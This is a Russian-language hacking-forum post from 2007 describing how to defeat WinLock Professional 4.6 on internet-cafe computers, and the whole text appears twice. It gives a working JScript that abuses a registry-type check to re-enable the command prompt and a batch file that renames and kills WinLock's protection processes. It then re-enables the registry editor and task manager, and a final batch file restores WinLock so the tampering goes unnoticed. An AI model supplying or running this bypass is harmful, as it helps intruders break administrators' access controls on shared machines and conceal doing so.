mind
15.12.2007, 00:46
На днях в интернет-кафе столкнулся с такой противной программулиной WinLock Professional 4.6 (О ней упоминали вот здесь http://forum.antichat.ru/thread48982.html). Парился целый час, но потушить ее так и не удалось. Решение пришло уже дома, когда скачал последнюю версию программы с официального сайта http://www.crystaloffice.com/ru и начал эксперименты в более благоприятных условиях. Оно оказалось очень простым, но я все же решил поделиться им, может кому пригодиться.
Настройка программы админом заключается в расстановке флажков:
Вкладка Общие.
Защита:
Включить защиту;
Настройки:
Включить защиту при загрузке;
Мониторинг системы;
Защита от выгрузки;
Вкладка Система.
Безопасность:
Скрывать свойство папки;
Скрывать свойство дисплея;
Запретить обновление Windows;
Запретить редактор реестра;
Запретить диспетчер задач;
Запретить смену пароля;
Запретить консоль cmd.exe;
Запретить безопасный режим;
Запретить панель управления;
Запретить блокировку компьютера;
Запретить установку и удаление программ;
Меню Пуск и панель задач:
Снимаем галочку с пункта Выполнить;
Снимаем галочку с пункта Смена пользователя;
Запретить настройку панели задач;
Рабочий стол:
Запретить Active Desktop;
Запретить переименование ярлыков на рабочем столе;
Запретить фоновый рисунок HTML;
Запретить изменение фонового рисунка;
Диски:
Снимаем галочку с системного диска в нашем случае это диск C:\
Файл: здесь добавляем следующий файл
C:\WINDOWS\system32\gpedit.msc
Галочку разрешить чтение не ставить! Жмем OK. Итак прога настроена и готова к обороне... И так приступим...
В более ранних версиях вобще отсутствовал какой либо контроль за состоянием процесса и его можно было выгрузить любым сторонним диспетчером задач, также отсутствовал надзор за изменением реестра. В версии 4.6 эти недостатки были исправлены однако не пользы от этого больше не стало. Наша цель выгрузить процесс WinLock'a, а точнее процессы: wlg.exe и winlock.exe. Функции первого и есть защита от выгрузки второго процесса =).
Пишем скрипт на jscript (или vbs кому как нравиться) и сохраняем как go.js:
var WSHShell = WScript.CreateObject("WScript.Shell");
// Так как не проверяется тип ключа, а только его наличие изменяем
// его тип с DWORD на REG_SZ и включаем обработку bat файлов)
WSHShell.RegWrite("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\ Windows\\System\\DisableCMD","Fuck!");
// Дублирование необходимо
// При желании здесь можно выставить небольшую задержку
WSHShell.RegWrite("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\ Windows\\System\\DisableCMD","Fuck!");
WSHShell.RegWrite("HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\ \Windows\\System\\DisableCMD","Fuck!");
// Запустим батник который выгрузит процессы WinLok'a
WSHShell.Run("kill.bat");
WScript.Sleep(1000);
// Теперь можно делать с виндой все что не взбредет в голову
// Включаем свойство папки
WSHShell.RegWrite("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\ CurrentVersion\\Policies\\Explorer\\NoFolderOption s",0,"REG_DWORD");
WSHShell.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\C urrentVersion\\Policies\\Explorer\\NoFolderOptions",0,"REG_DWORD");
// Разрешаем редактор реестра
WSHShell.RegWrite("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\ CurrentVersion\\policies\\system\\DisableRegistryT ools",0,"REG_DWORD");
WSHShell.RegWrite("HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\C urrentVersion\\policies\\system\\DisableRegistryTo ols",0,"REG_DWORD");
// Включаем диспетчер задач
WSHShell.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\C urrentVersion\\Policies\\System\\DisableTaskMgr",0,"REG_DWORD");
WSHShell.RegWrite("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\ CurrentVersion\\Policies\\System\\DisableTaskMgr",0,"REG_DWORD");
Пишем вот такой батник kill.bat
rename "C:\Program Files\WinLockPro\wlg.exe" die.exe
taskkill /IM wlg.exe /T /F
rename "C:\Program Files\WinLockPro\winlock.exe" die_.exe
taskkill /IM winlock.exe /T /F
Теперь в твоем распоряжении командная строка, редактор реестра,диспетчер задач - вобщем полный боекомплект =) осталось только добавить немного фантазии...
Как все свои дела сделал обязательно уберись за собой =) по отношению к винлоку делается это опять таки с помощью батника:
rename "C:\Program Files\WinLockPro\die.exe" wlg.exe
rename "C:\Program Files\WinLockPro\die_.exe" winlock.exe
start "C:\Program Files\WinLockPro\wlg.exe"
start "C:\Program Files\WinLockPro\winlock.exe"
Вот собственно и все )))
Настройка программы админом заключается в расстановке флажков:
Вкладка Общие.
Защита:
Включить защиту;
Настройки:
Включить защиту при загрузке;
Мониторинг системы;
Защита от выгрузки;
Вкладка Система.
Безопасность:
Скрывать свойство папки;
Скрывать свойство дисплея;
Запретить обновление Windows;
Запретить редактор реестра;
Запретить диспетчер задач;
Запретить смену пароля;
Запретить консоль cmd.exe;
Запретить безопасный режим;
Запретить панель управления;
Запретить блокировку компьютера;
Запретить установку и удаление программ;
Меню Пуск и панель задач:
Снимаем галочку с пункта Выполнить;
Снимаем галочку с пункта Смена пользователя;
Запретить настройку панели задач;
Рабочий стол:
Запретить Active Desktop;
Запретить переименование ярлыков на рабочем столе;
Запретить фоновый рисунок HTML;
Запретить изменение фонового рисунка;
Диски:
Снимаем галочку с системного диска в нашем случае это диск C:\
Файл: здесь добавляем следующий файл
C:\WINDOWS\system32\gpedit.msc
Галочку разрешить чтение не ставить! Жмем OK. Итак прога настроена и готова к обороне... И так приступим...
В более ранних версиях вобще отсутствовал какой либо контроль за состоянием процесса и его можно было выгрузить любым сторонним диспетчером задач, также отсутствовал надзор за изменением реестра. В версии 4.6 эти недостатки были исправлены однако не пользы от этого больше не стало. Наша цель выгрузить процесс WinLock'a, а точнее процессы: wlg.exe и winlock.exe. Функции первого и есть защита от выгрузки второго процесса =).
Пишем скрипт на jscript (или vbs кому как нравиться) и сохраняем как go.js:
var WSHShell = WScript.CreateObject("WScript.Shell");
// Так как не проверяется тип ключа, а только его наличие изменяем
// его тип с DWORD на REG_SZ и включаем обработку bat файлов)
WSHShell.RegWrite("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\ Windows\\System\\DisableCMD","Fuck!");
// Дублирование необходимо
// При желании здесь можно выставить небольшую задержку
WSHShell.RegWrite("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\ Windows\\System\\DisableCMD","Fuck!");
WSHShell.RegWrite("HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\ \Windows\\System\\DisableCMD","Fuck!");
// Запустим батник который выгрузит процессы WinLok'a
WSHShell.Run("kill.bat");
WScript.Sleep(1000);
// Теперь можно делать с виндой все что не взбредет в голову
// Включаем свойство папки
WSHShell.RegWrite("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\ CurrentVersion\\Policies\\Explorer\\NoFolderOption s",0,"REG_DWORD");
WSHShell.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\C urrentVersion\\Policies\\Explorer\\NoFolderOptions",0,"REG_DWORD");
// Разрешаем редактор реестра
WSHShell.RegWrite("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\ CurrentVersion\\policies\\system\\DisableRegistryT ools",0,"REG_DWORD");
WSHShell.RegWrite("HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\C urrentVersion\\policies\\system\\DisableRegistryTo ols",0,"REG_DWORD");
// Включаем диспетчер задач
WSHShell.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\C urrentVersion\\Policies\\System\\DisableTaskMgr",0,"REG_DWORD");
WSHShell.RegWrite("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\ CurrentVersion\\Policies\\System\\DisableTaskMgr",0,"REG_DWORD");
Пишем вот такой батник kill.bat
rename "C:\Program Files\WinLockPro\wlg.exe" die.exe
taskkill /IM wlg.exe /T /F
rename "C:\Program Files\WinLockPro\winlock.exe" die_.exe
taskkill /IM winlock.exe /T /F
Теперь в твоем распоряжении командная строка, редактор реестра,диспетчер задач - вобщем полный боекомплект =) осталось только добавить немного фантазии...
Как все свои дела сделал обязательно уберись за собой =) по отношению к винлоку делается это опять таки с помощью батника:
rename "C:\Program Files\WinLockPro\die.exe" wlg.exe
rename "C:\Program Files\WinLockPro\die_.exe" winlock.exe
start "C:\Program Files\WinLockPro\wlg.exe"
start "C:\Program Files\WinLockPro\winlock.exe"
Вот собственно и все )))